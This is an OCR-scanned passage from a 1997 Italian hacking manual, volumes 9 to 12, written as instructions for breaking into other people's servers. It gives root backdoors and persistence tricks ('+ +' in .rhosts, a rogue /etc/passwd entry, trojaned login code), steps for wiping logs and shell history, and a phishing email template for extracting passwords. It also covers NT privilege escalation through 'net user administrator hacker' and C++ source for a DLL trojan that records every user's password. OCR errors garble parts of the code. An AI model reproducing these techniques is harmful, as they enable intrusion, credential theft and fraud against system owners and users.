su un sistema, ma e’ probabile che non appena il SysAdmin notera’ qualche 
attivita. sospetta fara’ di tutto per rendere vano tutto il nostro lavoro e 

tenerci alla larga dal suo sistema. 


Se cio’ puo ostacolare un hacker alle prime armi, non potra’ pero’ fermare 
chi sa come reagire nel modo giusto in questa guerra virtuale tra Hacker e 
SysAdmin. 


Iniziamo a identificare l'obiettivo principale: cosa ci consente di eseguire 
qualsiasi comando, avere accesso a tutti i file e le directory, aggiungere o 
rimuovere a piacimento un account su un server, e così via? Ovviamente la 
risposta e: la shell di root, ossia /bin/sh. 


Ma se l'utente root (cioe’ il SysAdmin) dovesse toglierci i privilegi root, 
avremmo solo una possibilita’: hackerare di nuovo il server, sperando che il 
SysAdmin non si sia accorto del metodo che abbiamo utilizzato per "entrare" 
e non abbia corretto il problema. 


Questa ovviamente non e’ una soluzione brillante... percio vediamo come fare 
per avere qualche carta in piu da giocare. 


Un metodo puo essere creare un programma o uno script che abbia 1 privilegi 
di root. Infatti, quando copiamo un file ne conserviamo 1 privilegi; percio 

se ad esempio copiamo /bin/sh in /tmp/test anche se poi accediamo al server 
con un account di un utente qualsiasi (e quindi senza privilegi), /tmp/test 
avra’ la stessa identica funzione di /bin/sh in quanto non abbiamo copiato 
solo l'eseguibile della shell (sh) ma anche i suoi privilegi. Quindi mentre 
normalmente /bin/sh non e’ accessibile agli utenti, /tmp/test (o qualsiasi 

sia il nome che gli abbiamo voluto dare) sara’ una shell root utilizzabile 

da qualsiasi utente che sappia della sua esistenza. 


Per applicare i nuovi permessi a un file esistente dobbiamo eseguire il 
comando "chmod" seguito da permesso e nomefile (nel nostro caso /tmp/test 
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oppure un qualsiasi altro file contenente la shell). "chmod" serve per 
cambiare i permessi di un file. 


Se non conoscete bene Unix (e quindi non state capendo niente o quasi) vi 
consiglio per l'ennesima volta di installare Linux e di sperimentare con i 
comandi. Usate il comando "man chmod" per avere ulteriori informazioni sul 
comando chmod, oppure "man comando" per avere informazioni su un qualsiasi 
altro comando Unix. 


Se avete un client rlogin (oppure rsh o rexec) potete fare un'altra cosa. 


Come spiegato nel volume 7, il file .rhosts contiene una lista di username 
e password di chi puo’ accedere a un server senza bisogno di password; in 
pratica, e’ una lista di server e utenti "fidati" :) 


Aggiungendo una riga contentente soltanto questo: 
++ 


(senza le righe vuote prima e dopo) al file .rhosts (ad esempio usando PHF, 
Sendmail o "cat" da una shell per aggiungere questa riga al file, come 
spiegato nel volume 5), chiunque potra’ accedere al server usando rlogin, 
rsh e rexec ed eseguire comandi. Se non vogliamo dare accesso a chiunque 
(per evitare di essere scoperti subito) potremo anche dare accesso solo a 
noi stessi, usando: 


nome_del_nostro_server nostro_username 


(anziche’ + +), ma NON fatelo se l'account e’ il vostro... se e’ di qualcun 
altro e’ un discorso, altrimenti non fatelo. Infatti se e quando il SysAdmin 
dara’ un'occhiata al file .rhosts trovera’ in pratica il vostro "biglietto da 
visita", cioe© nome del vostro server e il vostro username! Altro che 
nascondere l'IP Address ;) 


Dato quindi che starete certamente usando uno dei metodi spiegati nell'ottavo 
volume, come il bounce tramite Telnet, e un account di qualche sperduta BBS 
oltreoceano, usare + + sara© piu’ che sufficiente nella maggior parte dei 

casi (diciamo pure sempre). 


Un altro metodo ancora e’ aggiungere un comando a uno dei file script di uno 
o piu utenti. Ma cos'e’ un file script? Non e altro che un file di testo 


contenente una lista di comandi da eseguire (come 1 file .BAT del DOS). 
Quindi se aggiungiamo un comando esso sara’ eseguito proprio come gli altri. 


Gli script sono .login e .logout (che vengono avviati rispettivamente quando 
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un utente si collega o si scollega), ma anche .profile e .cshrc e gli altri 
che iniziano con un punto in una directory utente. 
Aggiungendo ad esempio la riga seguente: 


if /tmp/programma exists run /tmp/programma 


lo script verifichera’ se il file /tmp/programma esiste e in caso affermativo 
lo eseguira’. Questo metodo e° quindi l'ideale per eseguire un comando, 
come ad esempio la shell, oppure per un troiano o una backdoor. 


Ma cos'e’ un troiano? E una backdoor? 


Un troiano (detto anche Trojan Horse) e° un programma che fa qualcosa di cui 
chi lo esegue e’ ignaro. In genere sono concepiti per far danni, o attivare 
altri programmi. 


Una backdoor, invece, e un programma che normalmente e° presente sul sistema 
(ad esempio "login", oppure i comandi presenti nella directory /bin), ma che 

e’ stato modificato dall'hacker per fare qualcosa di preciso. 

Quasi sempre questo "qualcosa" e accedere alla shell di root o eseguire uno 

o piu. programmi. 

L'utilità" di una backdoor e’ che anche se un SysAdmin cambia la password di 
root, o comunque Vi impedisce di usare la shell, voi avete sempre questo 
"passaggio segreto" per entrare nel sistema a sua insaputa, e senza lasciar 

traccia. 


Per chi conosce gia un po di C, diremo che una backdoor, nel caso piu 
semplice, non e altro che qualcosa del tipo: 


system('/bin/cp /bin/sh /tmp/usami!'); 


(esegue i comandi tra virgolette, in questo caso copia la shell in tmp) 

inserita in un punto di un qualsiasi programma. Un'ulteriore passo e 

fare in modo che solo chi conosce della backdoor possa farla entrare in 
funzione. Ad esempio, se la backdoor e stata inserita nel programma "login" 
potremmo fare in modo che se si avvia login in questo modo: 


login Lord_Shinva 
anziche eseguire il codice originale di login verra’ eseguita la backdoor, 
altrimenti verra’ eseguito il codice normalmente. Nient'altro che un 


semplice "if/then/else" come nella seguente pseudo-codifica: 


if (stremp(argv[1],"Lord_Shinva") { 
...c0dice della backdoor... 
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} 
else { 

...Codice di login... 
} 


In genere pero” creare una backdoor e° molto piu’ complicato che creare un 
troiano, poiche. mentre quest'ultimo e’ un semplice programmino in C che 
esegue un paio di chiamate system() per eseguire dei comandi, una backdoor 
deve comportarsi proprio come il programma originale di cui ha preso il posto 
e quindi e’ necessario avere il sorgente (listato) del programma originale. 

Cio non e impossibile, ma richiede gia° una certa bravura con il C e con 
Unix, e bisogna sapere dove cercare. 


Ma vi assicuro che col tempo, se avrete costanza nello studiare e mettere in 
pratica, creare una backdoor non sara’ niente di complicato, una volta 
reperito il listato del programma da sostituire (potreste addirittura farlo 
interamente da soli, se si tratta di un programmino come LS). 


Nei prossimi volumi impareremo tutto quello che c'e° da sapere per avere un 
controllo piu’ completo del sistema che vogliamo hackerare. Spiegheremo 
inoltre diversi aspetti di Unix che normalmente sono lasciati ai SysAdmin e 
agli utenti piu esperti... e che quindi ci interessano per poter degnamente 
competere con essi e sapere sempre come destreggiarsi in ogni situazione. 


Ovviamente non potremo spiegare tutto nel prossimo volume, quindi dovremo 
spezzare le lezioni in paragrafi. 


Copyright (C) 1997 by 
:: LORD SHINVA :: 


-Digital Alliance Confederation- 


VAIL AL VOLUME 10 


file:///D|/FILE%20CONDIVISI/EBOOK-GUIDE-CORSI-M...a]%20Enciclopedia%20di%20Lord%20Shinva/VOL9.HTM (4 di 4)09/11/05 17.37.14 


vol10 


GÌ Lord Shinva 
e) -DiGITAL::ALLIANCE- 


C:0.N:F.E:D.E:R.A:T.i:0.N 
Enciclopedia dell' Hacking 
Volume 10 


VIRTUOSISMI TECNICI: PARTE I 


III PÒ i 


Supponiamo di aver finalmente hackerato un server e di avere username e 
password di un utente. E ora cosa facciamo? Ci limitiamo a leggere la sua 
posta, a collegarci via Telnet dal suo account e cose del genere? 
Certamente no... 


I passi principali nell'hackerare un server consistono nel fare quanto segue: 


- prendere tutte le precauzioni prima di collegarsi: preferibilmente usare 
l'account di qualcun altro (un utente di cui abbiamo crackato la password) 
e/o usare un account Telnet su una BBS, utilizzare il "bounce" e così via 


- scegliere un server (di tipo Unix, in questo caso) e crackarne le password 
individuando la locazione del file, se le password sono shadow o meno, ecc 


- collegarsi con l'account crackato di uno degli utenti di quel server 


- utilizzare i comandi "who" e "ps -u vostro_user_name" per vedere chi 
e’ on-line e cosa sta facendo (se il SysAdmin e’ in giro, sara. meglio 
lasciar perdere e collegarsi piu’ tardi, meglio se di notte o la mattina 
molto presto) 

- digitare "unset HISTFILE" per far si che il file "history" (dove vengono 
annotate tutte le operazioni che svolgiamo!) venga eliminato non appena 
lasceremo il sistema 

- inviare, compilare e usare un programma per nasconderci dal log di utmp 


- controllare con il comando "who" se "si vede" che siamo in linea 


- se non si e riusciti a crackare la password di root, usare un exploit 
per ottenere accesso root, in modo da poter eseguire comandi nella shell 


- OPZIONALE: crearsi un nuovo account su quel server, utilizzando un nome 
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poco vistoso (dare un'occhiata al file delle password per uniformarvi 
agli altri in modo da non far saltare all'occhio il vostro nuovo account) 


- installare una backdoor (se si e in grado di farlo), oppure copiare la 
shell root /bin/sh in qualche directory "sperduta" sotto falso nome e 
cambiarne il livello d'accesso con chmod, in modo da poter usare la shell 
di root anche quando si accede al sistema con l'account di un utente 
qualsiasi (e quindi senza privilegi); se si e’ creato un nuovo account 
(vedi sopra) potremo mettere la shell "segreta" nella nostra directory 
utente, in modo che nessun altro la noti e possa usarla all'infuori di 
noi (un buon posto e° la directory .term nella directory /users oppure 
/home/users o comunque dove si trovano le directory degli utenti). 

Si puo” anche aggiungere un account al file delle password, in modo da 
utilizzare la shell root quando ci servira’, utilizzando semplicemente 
Telnet: usando PHF con il comando "echo stringa >> /etc/passwd" oppure 
editando direttamente il file delle password si aggiunga... 

nomequalsiasi::numeroutente:numerogruppo:/:/bin/sh 
oppure qualcosa di meno vistoso, come un finto "account di sistema" del 
tipo... 

spoolsys::13:12:system:/var/spool/:/bin/sh 

(ovviamente si potra’ anche utilizzare una password tra i due :: se non 
si vuole consentire a qualcun altro di accedere a questo account) 


- IMPORTANTISSIMO: cancellare tutte le tracce prima di lasciare il server 
e in particolare... 


- tutto quello che viene registrato riguardo al vostro server (host name, 
IP Address, date e orari) nei files di log in /var/log e /var/adm 


- eliminare sempre il file di history del vostro account (.bash_history), 
e per evitare che venga creato di nuovo lo si setti a null con il 
comando "In -s /dev/null .bash_history" 


- eliminare il file xferlog contenente il log dei trasferimenti di file 
(se ne sono fatti) 


Ora, quando vorremo collegarci di nuovo per utilizzare la shell root, non 
dovremo fare che collegarci con l'account di un utente qualsiasi e poi, in 
base a quello che abbiamo fatto prima, utilizzare la backdoor per accedere a 
root, oppure usare la shell "segreta" che abbiamo installato. 


Tutto questo andra’ fatto solo la prima volta, cioe quando hackeriamo 1l 
server. Cio ci consentira’ di non far notare un'attivita’ hacker su quel 
server, cosicche’ il nostro account (e soprattutto la shell root ;) durera” 

piu’ a lungo... anche per moltissimo tempo, se il SysAdmin non sta attento a 
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quel che accade nel suo sistema. 


NOTA IMPORTANTE: se non siete ancora in grado di nascondere le vostre tracce 
come descritto sopra, avrete bisogno di tempo per imparare, percio. NON 

tentate di hackerare un server. Usate Linux (che spero vi sarete finalmente 
installati ;) e provate, usando il comando "man nome_comando" ogniqualvolta 
non capite il funzionamento di un particolare comando. 

Sperimentate sempre prima in modalita’ locale (sul vostro computer), se ne 

avete la possibilita”. 


Quando dovete analizzare il contenuto di un file di log alla ricerca di 
informazioni da cancellare (come il vostro IP Address o l'host name del 
vostro provider) potete utilizzare "grep" (un comando Unix per cercare una 
stringa di testo in un file) come in questo esempio: 


cd /var/log 
grep hackers.com * 


in questo caso cercheremo l'host name "hackers.com" in tutti (*) i file della 
directory /var/log (ma anche /var/adm). 

Se l'output (1 risultati della ricerca) e° troppo lungo per essere contenuto 

in una pagina, bastera’ aggiungere il piping al comando "more", così”: 


grep hackers.com * | more 
e potremo comodamente scorrere in alto e in basso la nostra lista. 
Se ad esempio troverete qualcosa del genere: 


nome_file_log data orario nome_software_server nome_del_vostro_provider.com 
altro_file_log data orario nome_software_server nome_del_vostro_provider.com 


saprete che 1 file nome_file_log e altro_file_log stanno "registrando" cose 
che non vorreste proprio far sapere al SysAdmin! 


Come fregarli? E° presto detto... :) 


Esiste un file, chiamato syslog.conf (configurazione log di sistema) che si 
trova nella directory /etc 

Il suo compito e’ "dire" al sistema cosa loggare (registrare in file di log) 

e dove mettere i log (un altro file interessante e° /etc/login.defs dove 

e’ possibile abilitare/disabilitare il logging delle operazioni effettuate 

con file ad accesso root). 
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Ci bastera’ quindi editare il file /etc/syslog.conf e cancellare 1 file 
"scomodi"... ma non solo. Affinche° i cambiamenti apportati abbiano effetto, 
dovremo riavviare il programma syslogd, o piu° precisamente il suo processo 
(le operazioni che svolge in background). 


Ma prima di riavviare il processo dovremo disattivalo. Per farlo, useremo 
il comando "kill" (uccidi), in questo modo: digitiamo "ps -x" per vedere a 
quale numero di processo e’ associato syslogd. Il primo numero sulla 
sinistra sara’ quello che ci interessa: in pratica, e© come un numero di 
indentificazione che varia da processo a processo. 


Digitiamo ora "kill -HUP numero_di_processo" e syslogd verra’ disattivato e 
subito riavviato. Abbiamo ora ottenuto quello che volevamo: niente piu 
"spie" che possano aiutare il SysAdmin ad identificarci. 


NOTA: in Unix le maiuscole e le minuscole sono fondamentali. Attenetevi 
sempre alle mie istruzioni e tenete presente che i comandi sono quasi sempre 
in minuscolo, mentre le opzioni cambiano effetto a seconda che siano 
maiuscole o minuscole. 


(continua nel prossimo volume) 


Copyright (C) 1997 by 
:: LORD SHINVA :: 


-Digital Alliance Confederation- 
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Enciclopedia dell' Hacking 
Volume 11 


SOCIAL ENGINEERING 


I I I i 


Social Engineering, ovvero Ingegneria Sociale... cos'e? 


E° il metodo piu semplice ed efficace per ottenere informazioni che 
altrimenti non sapreste dove trovare, come ad esempio la password di un 
utente, o addirittura i suoi dati personali (indirizzo, telefono, ecc). 


Sono solo esempi, ma con un po di fantasia e fortuna potete fare davvero di 
tutto. Non si tratta, nel caso ve lo stiate chiedendo, di tecniche come 

quelle che abbiamo visto fino ad ora: niente Telnet, niente file di log, 

solo voi e la vostra intelligenza. 


Ma procediamo per ordine. 

Fare del "Social Engineering" significa far credere di essere qualcun altro 
allo scopo di ottenere qualcosa. 

Immaginate di andare dalla segretaria di Bill Gates a chiederle di versare 
sul vostro conto un paio di milioni. Al massimo vi ridera’ in faccia... :) 
Ma se invece fosse lui, il "caro" Bill, a telefonare alla sua segretaria da 
una riunione d'affari e dirle di sbrigare un attimino una faccenda urgente 


per conto suo.... ho reso l'idea? ;) 


Beh, normalmente ci si limita ad utilizzare il Social Engineering per 
ottenere password e dati personali, ma l'uso e lasciato a voi. 


Si puo fare S.E. (Social Engineering) per telefono o via modem (e Internet). 
Le regole sono semplici: 


- dovete agire "professionalmente" ed essere credibili 
- dovete informarvi sull'argomento che state per affrontare 


e, se utilizzerete il telefono: 
- dovete essere sicuri di voi stessi e di quello che dite 
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- dovete avere una voce credibile, che non sia cioe’ quella di un ragazzo 
che vuole sfottere un po’ per telefono... 


Per quelli che tra voi stanno pensando che 1l S.E. non funziona: vi basti 
sapere che praticamente tutti gli hackers piu’ conosciuti utilizzano proprio 
il S.E. per ottenere le informazioni di cui hanno bisogno. 

E l'unica "tecnica" che, se fatta come si deve, non fallisce e non diventa 
obsoleta con il passare del tempo. 


Ma ora veniamo alla pratica. 


Supponiamo ad esempio di voler ottenere la password di un utente (sia essa la 
password del suo account Internet oppure quella della sua mailbox). 


In quale caso potremmo chiedere a un utente la sua password? 


Probabilmente, nel caso in cui fossimo il SysAdmin (o un tecnico del servizio 
utenti) del suo provider. 


In questo caso, non dovremo fare altro che crearci un account di email su 
usa.net mailexcite.com che possa sembrare l'indirizzo email di un tecnico 
del provider, come ad esempio servizio_utenti@usa.net o altro. 


Meglio ancora, se avete un account di posta elettronica potete usare INAME 
(http://yahoo.iname.com) per creare un account email "virtuale". Potrete 
cioe’ crearvi un account come ad esempio servizio_tecnico @fastservice.com 
(che e MOLTO piu? credibile di pippo@hotmail.com) e tutta la posta che 
verra’ inviata a quell'account sara’ ridirottata anonimamente sul vostro 
account normale. 

Potrete scegliere tra vari nomi di server, e cio’ torna a vostro favore. 

Se state fingendo di essere del servizio tecnico o help utenti di un provider 
scegliete qualityservice.com, topservice.com, oppure cyberservices.com. 


Ora viene il bello. Supponiamo di voler ottenere una password di un server 
senza allarmare il SysAdmin tentando di prelevare il file delle password :) 


Cio che vi serve e l'indirizzo di email di un utente qualsiasi di QUEL 

server. Come trovarlo: se il server ha una messaggistica, un forum dove 

gli utenti possono chiacchierare... vedete II°. 

Altrimenti non scoraggiatevi: collegatevi a http://www.whowhere.com oppure a 
http://www.four11.com e cercate il server che vi interessa. 

Avrete una lista di tutte le email che vi possono interessare, complete di 

nome e cognome che vi torneranno certamente utili. 

Oppure potete usare finger, se e abilitato... facendo "finger @server.com" 
avrete la lista di tutti gli utenti presenti su quel sistema. 
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Come vedete, ci sono molti modi per ottenere la stessa cosa. 


Fate MOLTA ATTENZIONE a non scrivere all'indirizzo del SysAdmin, del 
Webmaster o di uno dei responsabili o dei tecnici del server! 


Trovata la "cavia" ora dovete scrivergli un messaggio di questo tipo: 
S 
Da: Servizio_Tecnico@TopService.com 
A: utente @provider.it 
Soggetto: 
Gentile Utente, 

per offrirLe un miglior servizio abbiamo aggiornato il server software 
del ns. Internet Provider. Per problemi tecnici non ci e’ stato possibile 
importare il database Utenti, motivo per cui La preghiamo di volerci 
comunicare al piu’ presto il suo username e la sua password, scrivendo al 
nostro indirizzo email: Servizio Tecnico@TopService.com 

La ringraziamo per la cortese attenzione. 


Cordiali saluti 


Dr. Antonio Brambilla 
Resp. Servizio Tecnico 
XXXKX Internet Provider 


"SR 


Poche righe, insomma, ma ben scritte. 
E per rendere piu’ convincente il tutto, aggiungete anche informazioni come 
indirizzo (vero) e nomi e cognomi (falsi), telefono e fax (falsi), ecc... 


Vi meraviglierete di come talvolta anche le societa’ che si appoggiano ai 
provider per l'accesso a Internet cascano in questi trucchi. 


NOTA: in alcuni casi puo essere utile utilizzare la tecnica delle FakeMail 
per inviare un "ordine di servizio" a qualcuno da parte di una persona (un 
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dirigente, ad esempio) di cui si conosca pero l'indirizzo di email. 
Ricordate pero” che, in caso di risposta, l'email andra’ all'indirizzo falso 
che avremo utilizzato (cioe’ quello del dirigente!). 


Se avessimo invece voluto fare qualcosa di piu complicato, come ottenere un 
qualche tipo di informazioni piu o meno riservate da una grande azienda, 
avremmo dovuto utilizzare (preferibilmente) il telefono. Avere prontezza 

di riflessi, sicurezza e una voce "adatta allo scopo" in tal caso sara” 
indispensabile se non si vuole mandare tutto a monte. 


Nel caso di personale particolarmente attento (raro...), del tipo che vuole 
chiedere prima un'autorizzazione al capo e roba del genere, e’ utile far 
capire di avere altri affari da sbrigare, di essere seccati dall'inettitudine 

di quell'impiegato e roba del genere... perdere la pazienza, insomma, senza 
essere ne’ patetici ne’ isterici. 


Il resto e lasciato a voi. 


Copyright (C) 1997 by 
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e) -DiGITAL::ALLIANCE- 


C:0.N:F.E:D.E:R.A:T.i:0.N 
Enciclopedia dell' Hacking 
Volume 12 


HACKING AVANZATO DI WINDOWS NT 

Dal momento che ci stiamo accingendo ad esplorare Windows NT, mi aspetto che 
conosciate gia’ il funzionamento dei Registry di Windows, in quanto una loro 
trattazione esula dall'hacking ed e) comunque reperibile sia in libreria che 

su Internet. 


Mi limitero* quindi a ricordare solo le basi della sicurezza in Windows NT: 


LSA (Local Security Authority, ovvero Autorit... di Sicurezza Locale) 
E° conosciuto anche con il nome di Security Subsystem (Sottosistema di 
Sicurezza). E° il componente centrale della sicurezza NT ed $ preposto 
all'autenticazione degli utenti e all'audit (logging). 


SAM (Security Account Manager, ovvero Manager di Sicurezza degli Account) 
Fornisce autenticazione al LSA e controlla i gli account per gruppi e utenti. 


SRM (Security Reference Monitor, ovvero Monitor della Referenza di Sicurezza) 
Controlla gli account ogniqualvolta un utente cerca di accedere a un file o 
directory e gli da o nega il permesso in base ai suoi privilegi d'accesso, e 
comunica le infrazioni al LSA tramite messaggi di audit. 


UI (User Interface, ovvero Interfaccia Utente) 
E° in pratica quello che l'utente vede, cioe’ l'interfaccia con la quale egli 
interagisce e che comunica in modo invisibile con gli elementi appena visti. 


ACL (Access Control List, ovvero Lista di Controllo dell'Accesso) 

Ogni utente ha una ACL che rappresenta i suoi permessi e privilegi in fatto 
di directory, file, ecc. 

L'autenticazione degli utenti funziona nel modo seguente: l'utente effettua 
il login, NT crea un token che rappresenta quell'utente e associa al token i 


privilegi che trova nella sua ACL, e agisce in base ad essi. 


Procederemo ora per quesiti, in modo da rendere piu’ agevole la lettura. 
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QUESITO 1: Quali sono i permessi di default? 
Questi sono i permessi per gli utenti di default: 


- Server Operators: spegnimento, anche da remoto; reset dell'orologio di 
sistema; backup e restore. 

- Backup Operators: spegnimento; backup e restore. 

- Account Operators: spegnimento. 

- Print Operators: spegnimento. 


Questi sono 1 permessi per le directory di Windows NT: 


\(root), \SYSTEM32, \WIN32APP 
Server Operator e Everyone possono leggere ed eseguire file, mostrare i 
permessi e cambiare gli attributi dei file. 


\SYSTEM32\CONFIG 
Everyone puo effettuare una DIR in questa directory. 


\SYSTEM32\DRIVERS, \SYSTEM\REPL 
Server Operator ha accesso completo. Everyone ha solo accesso in lettura. 


\SYSTEM32\SPOOL 
Server Operator e Print Operator hanno accesso completo. Everyone ha solo 
accesso in lettura. 


\SYSTEM32\REPL\EXPORT 
Server Operator puo leggere ed eseguire file, permessi e attributi. 
Replicator ha solo accesso in lettura. 


\SYSTEM32\REPL\MIMPORT 
Server Operator e Replicator possono leggere ed eseguire file, permessi e 
attributi. Everyone ha accesso in lettura. 


\USERS 

Account Operator puo leggere, scrivere, cancellare ed eseguire file. 
Everyone puo effettuare una DIR. 

\USERS\DEFAULT 

Everyone pu leggere, scrivere ed eseguire file. 


QUESITO 2: Qual'e’ l'account pi— interessante? 
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Sicuramente l'account dell'amministratore (SysAdmin), ma potrebbe essere 

stato rinominato... in tal caso, basta eseguire "NBTSTAT -A ipaddress" per 
conoscere il nuovo nome dell'account e opzionalmente anche un elenco completo 
di quali servizi sono in funzione, il nodename e l'eventuale indirizzo 

hardware dell'ethernet (in caso di LAN). 


QUESITO 3: Dove si trovano le password in Windows NT? 


Da nessuna parte. Windows NT (come anche UNIX) non immagazzina le password, 
ma bensi un hash (valore numerico calcolato in base alla password, dal quale 
non si puo risalire alla stringa originale, in quanto e solo un numero). 


Per crackare gli hash si puo utilizzare il programma PWDUMP (lo potete 
trovare sui siti hacker) e comunque si tratta di un attacco basato su 
dizionari, quindi di tipo "brute force" (forza bruta). 


Quindi, dicevamo, la domanda giusta sarebbe: "dov'e l'elenco degli hash?" 


La risposta e: nella directory \WINNT\SYSTEM32\CONFIG c'e’ un file chiamato 
SAM. E° questo il database che cerchiamo. E° leggibile da tutti gli utenti 

(a meno che quel simpaticone del SysAdmin non ci abbia messo lo zampino), ma 
comunque non si puo’ leggere in quanto bloccato (via sharing) perche e in 

uso dai componenti di sistema di NT. A questo punto il SysAdmin giubila ed 
esulta, ma l'hacker sa dell'esistenza di SAM.SAV che $ il backup di SAM... 


Inoltre, durante l'installazione di NT, una copia del SAM viene posta in 
\WINNT\REPAIR. Quasi sicuramente troveremo solo gli account Administrator e 
Guest, ma credo che Administrator (SysAdmin) sia abbastanza... 


A proposito del SAM... se siete completamente pazzi potete anche mettere le vostre manacce nelle 
keys del SAM. Per esempio, schedulando il servizio di logon come LocalSystem e permettendogli di 
interagire con il desktop, e poi schedulando una sessione interattiva di regedt32.exe (come 
LocalSystem) con il quale manipolare le keys. Ovviamente se non sapete a cosa serve tutto questo 
sar... meglio non toccare niente, altrimenti saranno guai grossi... 


QUESITO 4: Come accedere al file system se e’ di tipo NTFS anziche’ FAT ? 


Se siete vicini alla macchina (cioe in locale), effettuate un boot tramite 

un dischetto MS-DOS ed eseguite NTFSDOS.EXE per accedere al NTFS. Oppure 
potete utilizzare il dischetto di boot di Linux... in pratica basta 

semplicemente eseguire Linux. Pu* sembrare strano, ma cio vi dara’ accesso 
totale al file system in quanto Linux puo leggere NTFS. 


QUESITO 5: Sono vicino alla console locale, come accedo alle informazioni 
degli altri computer? 
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Se il computer sul quale vi trovate e un domain controller (oppure se e 
collegato al computer) bastera’ fare quanto segue: 


1. Da USER MANAGER, create una trusting relationship (rapporto di fiducia) 
con l'obiettivo. 
2. Inserite la password (quello che volete). Sembrera’ non funzionare, ma 
l'obiettivo sar... ora nella vostra trusting list. 
3. Avviate NT Explorer e cliccate col tasto destro del mouse su qualsiasi 
cartella. 
. Selezionate SHARING (condivisione). 
. Dalla finestra SHARED, selezionate ADD ("aggiungi", se NT $ in italiano). 
. Dal menu ADD, selezionate il vostro obiettivo (il server "vittima"). 
. Ora vedrete l'intera lista dei gruppi dell'obiettivo. 
. Selezionate SHOW USERS e vedrete l'intera lista utenti, completa di nomi 
dei file, directory e descrizioni... 


DIN A 


QUESITO 6: Ho accesso Administrator, come accedere alla lista degli utenti? 
Ah ci siete riusciti, bene bene... ;) Usate questo metodo: 


- Eseguite NBTSTAT -A ipaddress 

- Aggiungete il nome che otterrete al file LMHOSTS 

- Se la versione di NT $ inferiore alla 4, digitate NBTSTAT -R per effettuare 
il refresh dei nomi del NetBios 

- Eseguite NET VIEW \\nomemacchina per vedere gli shares ("condivisioni") 

- Eseguite DIR \\nomemacchina\share per listare gli shares (se aperti) 

- Eseguite NET VIEW \\ipaddress oppure NET VIEW \\nome.completo.com se usate 
Windows NT 4.0 


QUESITO 7: Ho accesso Guest... come faccio ad avere accesso Administrator? 


NT 3.51 ha varie directory (e file) leggibili e scrivibili da tutti gli 

utenti per default. Potete editare le associazioni tra un'applicazione e i 

file dati, usando REGEDT32.EXE, ma prima dovete creare (e compilare) 
un'applicazione per Win32 (magari in Delphi o C++ a 32-bit) che si limiti ad 
eseguire i seguenti comandi e nient'altro: 


net user administrator hacker /y 
notepad %1 %2 %3 %4 %5 


Inviate (tramite upload) questa "applicazione" in una share (directory di 
condivisione) a cui avete accesso e cambiate l'associazione tra i file .txt e 
notepad in modo che punti alla locazione completa del vostro file (ad esempio 
\\NomeWorkstation\RWShare\hahaha.exe). 
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Non appena un file di testo verra’ visualizzato da qualcuno sul server, 
quell'associazione verra’ eseguita e sara’ attivato l'user Administrator con 
password "hacker", alla faccia del SysAdmin... 


Per questo motivo, se io fossi il SysAdmin eliminerei il permesso Everyone 
dalla chiave HKEY_CLASSES_ROOT dei registry, dando l'accesso completo solo a 
Creator e Owner. 


QUESITO 8: La SYSTEM23?2 nella directory di sistema di NT $ scrivibile, cosa 
si potrebbe fare? 


Se il sistema e. un Windows NT versione 4.0 la risposta e: molte cose... :) 
Basta creare un troiano sotto forma di DLL e rinominarlo FPFNWCLNT.DLL e 
quindi metterlo in quella directory. Ad esempio, utilizzando questo troiano 
scritto in C++ troverete nella directory \TEMP del server tutti gli username 

e password di tutti gli utenti che accedono al sistema... 


#include <windows.h> 
#include <stdio.h> 
#include <stdlib.h> 


struct UNI_STRING { 
USHORT len; 
USHORT maxlen; 
WCHAR *buff; 


Di 
static HANDLE fh; 


BOOLEAN __stdcall InitializeChangeNotify () 
{ 
DWORD wrote; 
fh = CreateFile("C:\\temp\\shinva.txt", GENERIC_WRITE, 
FILE_SHARE_READJFILE_SHARE_WRITE, 0, CREATE_ALWAYS, 
FILE_ATTRIBUTE_NORMALIJFILE_FLAG_WRITE_THROUGH, 
0); 
WriteFile(fh, "Procedura InitializeChangeNotify avviata\n", 31, &wrote, 0); 
return TRUE; 


} 


LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid, 
struct UNI_STRING *passwd) 


{ 
DWORD wrote; 
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WCHAR wbuf[200]; 
char buf[512]; 

char buf1[200]; 
DWORD len; 


memcpy(wbuf, user->buff, user->len); 
len = user->len/sizeof(WCHAR); 
wbuf][len] = 0; 

wcstombs(bufl, wbuf, 199); 

sprintf(buf, "User = %s : ", buf1); 
WriteFile(fh, buf, strlen(buf), &wrote, 0); 


memcpy(wbuf, passwd->buff, passwd->len); 
len = passwd->len/sizeof(WCHAR); 
wbuf]len] = 0; 

wcestombs(buf1, wbuf, 199); 

sprintf(buf, "Password = %s : ", buf1); 
WriteFile(fh, buf, strlen(buf), &wrote, 0); 
sprintf(buf, "RID = %x\n", rid); 
WriteFile(fh, buf, strlen(buf), &wrote, 0); 
return OL; 


} 


Quando analizzate il vostro "log file" controllate se ci sono username con 
SID pari a -500 (SysAdmin). Guest ha SID pari a -501. 

Ovviamente bisognera’ riavviare il server dopo aver inviato la DLL, per 
farla attivare. 


QUESITO 9: Mi trovo con la schermata di login di NT (quella che esce premendo 
CTRL-ALT-DEL), come faccio per bypassarla? 


Ecco qui di seguito spiegata la procedura per liberarsi dello screen-saver 
(funziona solo con NT inferiore alla versione 4.0). 


Basta entrare come Administrator e verra’ mostrato lo schermo del desktop per 
alcuni secondi. Utilizzando il mouse (prima che lo schermo desktop non sia 
piu accessibile) si possono effettuare modifiche, spostamenti, ecc. 

Se cio’ non dovesse accadere perche’ e stato installato il Service Pack 

(sulla 3.x) c'e’ ancora una speranza: bisognera’ andare su un'altra 

workstation e digitare "shutdown \\momecomputer /t:30" in modo che venga 
attivato uno shutdown (spegnimento) entro 30 secondi sul computer "vittima" 

e appaia una Security Window. A questo punto si potra’ digitare il comando 
"shutdown \\nomecomputer /a" in modo che lo shutdown venga annullato. 
Andando sul computer "vittima" e muovendo il mouse lo schermo si cancelleraÈ 
e potremo premere CTRL-ALT-DEL per far apparire di nuovo la Security Window. 
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Si scelga "cancel" e si avra” immediatamente accesso al Program Manager! 
QUESITO 10: Come faccio a sapere da remoto se si tratta di NT o 95 ? 


In genere e usanza dei Webmaster scrivere nelle pagine Web "Noi usiamo 
Windows NT" o qualcosa del genere, ma nella maggioranza dei casi ci 
limiteremo a controllare che la porta 135 sia aperta (tramite un port 

scanner o una semplice connessione via Telnet). 

A questo punto bastera’ dare un'occhiata ai registry: se 

HKEY_LOCAL MACHINE\Software\Microsoft\WindowsNT esiste, saremo sicuri che non 
si tratti di Windows 95. 

Infine, uno sguardo alla key \CurrentVersion\CurrentVersion ci permettera’ di 
capire di quale versione si tratta. 

In alternativa, si puo controllare l'esistenza delle porte del NetBios (137 

e 139) e dei servizi SMB. 


